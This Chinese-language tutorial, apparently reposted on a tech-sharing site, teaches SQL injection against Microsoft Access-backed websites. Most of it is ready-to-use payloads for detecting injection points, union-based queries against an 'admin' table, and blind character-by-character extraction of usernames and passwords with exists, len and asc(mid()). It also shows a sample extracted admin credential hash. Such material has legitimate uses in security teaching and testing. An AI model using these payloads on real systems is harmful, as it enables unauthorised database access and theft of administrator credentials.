标签：exists admin 列名 top ACCESS SQL id select 注入

简介

​ Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点，是 Microsoft Office 的系统程序之一。

access数据库结构

​ access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。

测试SQL注入方法

联合查询

#判断注入
 and 1=1 
 and 1=2
 
#猜列数
order by 3
	
#猜表名（报错说明表名不存在，将admin换成别的继续猜）
union select 1,2,3 from admin
	
#猜列名（列名位置放置页面上显示的数字位置上）（报错说明列名不存在，换列名继续猜）（列名猜对后输出账号密码）
union select 1,2,username from admin 

逐字猜解法

#判断注入
and 1=1 and 1=2

#猜表名
and exists (select * from admin) 

#猜列名
and exists (select user_name from admin) 

#查数据：
1.确定长度 
and (select top 1 len(user_name ) from admin)=5(user_name 的长度=5，正常则=5，也可以用>,<号去判断）
2.确定asc数据(asc编码)
and (select top 1 asc(mid(user_name ,1,1)) from admin)=97 判断第一位（97代表‘a’的ascll值）
and (select top 1 asc(mid(user_name ,2,1)) from admin)=97 判断第二位

（user_name =admin 第一位a 第二位d 第三位m 第四位i 第五位n pass_word=a48e190fafc257d3）

access注入基本流程

• 判断有无注入

• 猜解表名

• 猜解字段

• 猜解管理员ID值

• 猜解用户名和密码长度

• 猜解用户名和密码

判断有无注入

粗略型：提交单引号'  参数值-1 
逻辑型（数字型注入）：and 1=1 / and 1=2
逻辑型（字符型注入）：' and '1'='1 / ' and '1'='2
逻辑型（搜索型注入）：%' and 1=1 and '%'='% / %' and 1=2 and '%'='%

猜解表名

#用exists判断select * from admin的结果是否为真
and exists (select * from 表名)

#（<>：不等于）， count是统计的函数，统计表中的所有字段。列数不等于0说明存在表
and 0<>(select count(*) from 表名) 

猜解字段

#若页面返回正常，就说明admin 表里存在id这个字段
and exists (select id from admin)

猜解管理员ID值

#若页面返回正常，就说明存在id=1的帐号
and exists (select id from admin where id=1)

猜解用户名和密码长度

#猜出存在id=1的帐号,下面语句页面返回正常，就说明UserName字段长度小于6
and exists (select id from admin where len (UserName) >6 and id=1)

#top表示把最前面的一条记录提取出来；
and (select top 1 len(UserName) from admin)=8

猜解用户名和密码

and (select top 1 asc(mid(列名,1,1)) from 表名)>0

and (select top 1 asc(mid(UserName,1,1)) from admin)=97 判断第一位（97代表‘a’的ascll值）
and (select top 1 asc(mid(UserName,2,1)) from admin)=97 判断第二位

标签：exists,admin,列名,top,ACCESS,SQL,id,select,注入
来源： https://www.cnblogs.com/-meditation-/p/16031338.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。